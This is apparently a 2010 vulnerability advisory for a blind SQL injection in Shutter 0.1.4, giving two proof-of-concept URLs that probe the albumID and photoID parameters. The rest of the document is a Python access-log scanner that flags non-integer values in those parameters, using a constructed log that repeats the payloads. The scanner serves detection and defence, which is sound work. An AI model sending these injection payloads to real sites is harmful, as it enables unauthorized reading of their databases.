# Exploit Title: Shutter 0.1.4 Blind SQL Injection
# Date: March 18, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/shutter-php/files/shutter/v0.1.4/shutter_0.1.4.zip/download
# Version: version 0.1.4

The albumID and photoID parameters are vulnerable to SQL Injection.

POC:
http://192.168.1.149/shutter/admin.html?albumID=2%20and%20substring%28@@version,1,1%29=5
http://192.168.1.149/shutter/admin.html?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5
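
A detection check for the two parameters named above, as an added example that is not part of the original advisory or of Shutter's code: it scans web access logs for albumID or photoID values that are not bare integers. It assumes both IDs are unsigned decimal integers and that the log is in Common Log Format; the log lines and client addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameters the advisory names as injectable; both should carry plain integer IDs.
NUMERIC_PARAMS = ("albumID", "photoID")
INTEGER = re.compile(r"[0-9]{1,10}")  # assumption: IDs are unsigned decimal integers
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')


def non_integer_params(url):
    """Return {param: decoded value} for each ID parameter that is not a bare integer."""
    findings = {}
    # parse_qsl percent-decodes the value, so %20 and %28 variants are normalised first.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not INTEGER.fullmatch(value):
            findings[name] = value
    return findings


def scan_access_log(lines):
    """Yield (client, path, findings) for each log line with a suspect ID parameter."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the assumed format
        findings = non_integer_params(m.group(2))
        if findings:
            yield m.group(1), urlsplit(m.group(2)).path, findings


# Constructed sample log: two ordinary requests, then the two request shapes from the POC.
SAMPLE_LOG = [
    '203.0.113.7 - - [18/Mar/2010:10:00:01 +0000] "GET /shutter/admin.html?albumID=2 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [18/Mar/2010:10:00:05 +0000] "GET /shutter/admin.html?albumID=2&photoID=5 HTTP/1.1" 200 5301',
    '198.51.100.23 - - [18/Mar/2010:10:02:11 +0000] "GET /shutter/admin.html'
    '?albumID=2%20and%20substring%28@@version,1,1%29=5 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [18/Mar/2010:10:02:12 +0000] "GET /shutter/admin.html'
    '?albumID=2&photoID=5%20and%20substring%28@@version,1,1%29=5 HTTP/1.1" 200 5301',
]

if __name__ == "__main__":
    for client, path, findings in scan_access_log(SAMPLE_LOG):
        print(client, path, findings)
```

The same integer-only rule, enforced server-side before the value reaches a query (together with parameterized statements), is what closes the issue; the log scan only shows where it has been probed.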